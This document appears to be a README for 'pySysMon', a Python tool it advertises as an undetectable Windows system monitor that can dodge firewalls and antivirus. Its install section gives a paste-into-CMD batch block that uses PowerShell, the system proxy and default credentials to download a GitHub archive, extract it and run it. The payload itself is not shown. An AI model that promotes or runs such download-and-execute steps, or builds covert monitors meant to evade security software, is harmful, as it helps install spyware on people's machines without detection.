
This tool can also be used as a undetectable system monitor for windows. Which can dodge Firewall and Antivirus easily

Primary LanguagePython


How to install the system monitor,

  1. Go to your prefered folder location (make sure the name of the folder does not contain blank space)

  2. Open your CMD under that location

  3. Copy this following piece of code

    @echo off
    color 0a
    powershell -c $e=new-object net.webclient ; $e.proxy=[net.webrequest]::getsystemwebproxy();$e.proxy.credentials=[net.credentialcache]::defaultcredentials;$e.downloadfile('https://github.com/maksudchowdhury/pySysMon/archive/refs/heads/main.zip','%cd%/pySysMon.zip')
    powershell Expand-Archive -LiteralPath pySysMon.zip -DestinationPath pySysMonExt
    del /f "pySysMon.zip"
    move "%cd%"\pySysMonExt\pySysMon-main "%cd%"
    rename "pySysMon-main" "pySysMon"
    rmdir "pySysMonExt"
    cd "pySysMon"
    python39 manage.py -s
  4. Paste the code in the terminal

  5. Press enter

  6. If everything goes ok you'll see a message confirming the monitor is runnig.

  7. After this you'll find a folder named 'pySysMon' inside your directory, Go to that folder

  8. Open the CMD under 'pySysMon' folder location

  9. To know more about the commands type,

    python39 manage.py -h

Some Screenshots of the system,

  •  Initializing a CMD under a preferred location,


  • After pasting the installation code from the GitHub readme file,


  • Download and extraction phase of pySysMon files,


  • After the system has initialized the first time,


  • ' Help ' window of pySysMon,


Keep Learning & take care of yourself .... 😁😁😁